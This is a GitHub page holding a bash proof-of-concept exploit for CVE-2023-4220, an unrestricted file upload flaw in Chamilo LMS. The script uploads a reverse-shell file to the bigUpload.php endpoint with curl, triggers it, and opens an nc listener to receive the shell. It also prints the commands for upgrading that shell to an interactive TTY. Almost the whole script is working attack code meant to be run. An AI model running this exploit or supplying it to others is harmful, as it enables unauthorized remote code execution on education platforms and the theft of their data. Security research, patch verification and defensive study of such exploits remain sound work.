-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathCVE-2023-4220.sh
89 lines (79 loc) · 2.41 KB
/
CVE-2023-4220.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
# Exploit Title : Chamilo LMS CVE-2023-4220 Exploit
# Date : 11/28/2023
# Exploit Author : Ziad Sakr (@Ziad-Sakr)
# Version : ≤v1.11.24
# CVE : 2023-4220
# CVE Link : https://nvd.nist.gov/vuln/detail/CVE-2023-4220
#
# Description :
# This is an Exploit for Unrestricted file upload in big file upload functionality in Chamilo-LMS for this
# location "/main/inc/lib/javascript/bigupload/inc/bigUpload.php" in Chamilo LMS <= v1.11.24, and Attackers can
# obtain remote code execution via uploading of web shell.
#
# Usage: ./CVE-2023-4220.sh -f reveres_file -h host_link -p port_in_the_reverse_file
#!/bin/bash
# Initialize variables with default values
reverse_file=""
host_link=""
port=""
#------------------------------------------------
RED='\033[0;31m'
GREEN='\033[0;32m'
NC='\033[0m'
# Usage function to display script usage
usage() {
echo -e "${GREEN}"
echo "Usage: $0 -f reverse_file -h host_link -p port_in_the_reverse_file"
echo -e "${NC}"
echo "Options:"
echo " -f Path to the reverse file"
echo " -h Host link where the file will be uploaded"
echo " -p Port for the reverse shell"
exit 1
}
# Parse command-line options
while getopts "f:h:p:" opt; do
case $opt in
f)
reverse_file=$OPTARG
;;
h)
host_link=$OPTARG
;;
p)
port=$OPTARG
;;
\?)
echo -e "${RED}"
echo "Invalid option: -$OPTARG" >&2
usage
;;
:)
echo -e "${RED}"
echo "Option -$OPTARG requires an argument." >&2
usage
;;
esac
done
# Check if all required options are provided
if [ -z "$reverse_file" ] || [ -z "$host_link" ] || [ -z "$port" ]; then
echo -e "${RED}"
echo "All options -f, -h, and -p are required."
usage
fi
# Perform the file upload using curl
echo -e "${GREEN}"
curl -F "bigUploadFile=@$reverse_file" "$host_link/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported"
echo
echo
echo -e "# Use This leter For Interactive TTY ;) " "${RED}"
echo "# python3 -c 'import pty;pty.spawn(\"/bin/bash\")'"
echo "# export TERM=xterm"
echo "# CTRL + Z"
echo "# stty raw -echo; fg"
echo -e "${GREEN}"
echo "# Starting Reverse Shell On Port $port . . . . . . ."
sleep 3
curl "$host_link/main/inc/lib/javascript/bigupload/files/$reverse_file" &
echo -e "${NC}"
nc -lnvp $port